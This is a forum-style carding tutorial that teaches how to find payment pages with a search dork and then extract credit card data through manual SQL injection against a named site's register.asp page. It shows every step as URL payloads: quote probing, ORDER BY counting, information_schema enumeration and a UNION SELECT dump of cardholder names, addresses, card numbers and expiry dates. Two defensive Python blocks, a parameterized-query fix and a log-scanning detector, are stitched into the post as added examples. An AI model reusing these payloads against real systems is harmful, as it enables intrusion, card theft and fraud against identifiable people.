Just sharing, no other intent.
Finding credit cards, the layman's (my) way.
1. Find a target
A target can be found with a dork, for example:
Code:
intext:"visa" "Credit Card Number:" "Expiration Date:"
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567
2. Find bugs (the most tedious step)
Finding bugs is somewhat tricky, because not every target has a bug that can be exploited (injected).
I usually look for bugs with a dork as well.
Code:
filetype:php site:target.com
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567'
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[MySQL][ODBC 5.1 Driver][mysqld-5.5.15]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
/ssl/register.asp, line 30
The version is mysqld-5.5.15, so it can be injected using the SQL injection method.
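For the defender, the error above shows two separate faults in register.asp: the eventnumber value is concatenated into the SQL text, and the driver's error is returned to the client. The following is an added example, not code from the original post, that puts the flawed lookup beside a hardened one; it assumes Python's sqlite3 as a stand-in for the site's MySQL/ODBC backend, and the table, column and function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed stand-in data; sqlite3 replaces the page's MySQL/ODBC backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE events (eventnumber INTEGER PRIMARY KEY, title TEXT)")
    db.execute("CREATE TABLE booklet (name TEXT, card TEXT)")
    db.execute("INSERT INTO events VALUES (567, 'Spring gala')")
    db.execute("INSERT INTO booklet VALUES ('constructed-name', 'constructed-card')")
    return db

def lookup_vulnerable(db, raw):
    # The flaw: the parameter is pasted into the SQL text, and the
    # driver's error message is handed back to the client verbatim.
    try:
        return db.execute(
            "SELECT title FROM events WHERE eventnumber = " + raw).fetchall()
    except sqlite3.Error as exc:
        return "database error: %s" % exc

def lookup_hardened(db, raw):
    # 1. Allow-list: eventnumber must be a short ASCII decimal integer.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        return "invalid request"
    try:
        # 2. Bound parameter: the value is data, never SQL syntax.
        return db.execute(
            "SELECT title FROM events WHERE eventnumber = ?", (int(raw),)).fetchall()
    except sqlite3.Error:
        # 3. Generic reply; the detail goes to the server log, not the page.
        return "invalid request"

if __name__ == "__main__":
    db = make_db()
    for value in ("567", "567'", "567 and 1=0 union all select card from booklet"):
        print(repr(value), lookup_vulnerable(db, value), lookup_hardened(db, value))
```

The same three controls apply to the classic ASP/ODBC stack on the page: validate the numeric parameter, bind it through a parameterized command, and turn off detailed error pages for remote clients.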
3. Injection
Injection can be done with the usual tools: havij, darkmysqli, sqlmap and the like.
Here I show it manually.
3.a
Code:
+order+by+1--
and so on..
found up to:
+order+by+28--
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
3.b
tables
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.tables+where+table_schema=database()--
Code:
alzdenvermimauction,alzearlystageforum,alzemailanote,alzevercare,alzevercare_springs,alzgolftournament,alzhelpline,alznecklace,alznecklace2,alznewsletter_preferences,alzpdf_booklet,alzperspectives,alzperspectives2,alzpolarplunge,alzpostanote,alzsurvey1,alzsurvey2,alzsurvey3,alzsymposium,alzsymposium2010,alzsymposium_new,alztime,alztimereporting,alztributeflag_denver,alzwhyplunge,customers,formfields,forms,plainscentercontactus,plainscenterdonate,plainscenterdonotemail,plainscenterevents,plainscentergiftmembership,plainscenterjoin,plainscentermembers,plainscenternewsletteremails,plainscenternewsletters,plainscenternewslettertesters,plainscenterregister,plainscenterusers,plainscentervolunteer,states,wingsbricks,wingscontactus,wingscontactus_events,wingsdonations,wingsdonotemail,wingsevents,wingskit_item,wingsmembers,wingsnewsletters,wingsnewslettersignup,wingsnewslettertestemails,wingsregister,wingswasp_counties,wingswasp_evaluation,wingswasp_kit_info,wingswasp_kit_item,wingswasp_locations,wingswasp_member,wing
3.c
check columns
Here I take the table alzpdf_booklet, converted to hex = 616c7a7064665f626f6f6b6c6574
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,database(),group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.columns+where+table_name=0x616c7a7064665f626f6f6b6c6574--
Code:
entrydatetime,First_Name,Last_Name,Organization,Address,City,State,Zip_Code,Phone_Number,Email_Address,Name_On_CreditCard,Credit_Card_Type,Credit_Card_Number,Credit_Card_Expiration_Month,Credit_Card_Expiration_Year,Total,id,Comments,bookletoption
3.d
dump..
Here I dump several columns
Code:
First_Name,0x3a,Last_Name,0x3a,Address,0x3a,City,0x3a,State,0x3a,Credit_Card_Type,0x3a,Credit_Card_Number,0x3a,Credit_Card_Expiration_Month,0x3a,Credit_Card_Expiration_Year
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,database(),group_concat(First_Name,0x3a,Last_Name,0x3a,Address,0x3a,City,0x3a,State,0x3a,Credit_Card_Type,0x3a,Credit_Card_Number,0x3a,Credit_Card_Expiration_Month,0x3a,Credit_Card_Expiration_Year),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+alzpdf_booklet--
I AM NOT RESPONSIBLE FOR ANY MISUSE OF THIS TUTORIAL
by satality32
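From the defender's side, each step in section 3 leaves a recognisable request in the web server's access log. The following is an added example, not part of the original post: a small scanner that decodes query strings and flags those request shapes, run over constructed log lines. The rule names, client addresses and log entries are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Rules derived from the request shapes shown in steps 2 and 3.a-3.d above.
RULES = [
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\.", re.I)),
    ("hex-literal", re.compile(r"\b0x[0-9a-f]{4,}\b", re.I)),
    ("trailing-quote-or-comment", re.compile(r"('|--)\s*$")),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')

def scan_request(target):
    """Return the sorted rule names matched by any decoded query value."""
    hits = set()
    # parse_qsl undoes %xx escapes and '+' so encoded requests are caught too.
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(rule for rule, pattern in RULES if pattern.search(value))
    return sorted(hits)

def scan_log(lines):
    """Return (client, hits) for each access-log line that matches a rule."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        hits = scan_request(m.group(2)) if m else []
        if hits:
            findings.append((m.group(1), hits))
    return findings

# Constructed log lines; client addresses are documentation ranges.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /register.asp?eventnumber=567 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /register.asp?eventnumber=567%27 HTTP/1.1" 500 301',
    '198.51.100.7 - - [01/Jan/2024:10:01:09 +0000] "GET /register.asp?eventnumber=567+order+by+28-- HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:02:30 +0000] "GET /register.asp?eventnumber=567+and+1=0+union+all+select+1,'
    'group_concat(column_name)+from+information_schema.columns+where+table_name=0x616c7a7064665f626f6f6b6c6574--'
    ' HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, hits in scan_log(SAMPLE):
        print(client, ", ".join(hits))
```

A single client that moves from the quote probe to the column-count probe to schema enumeration within minutes, as in the sample, is a stronger signal than any one rule on its own.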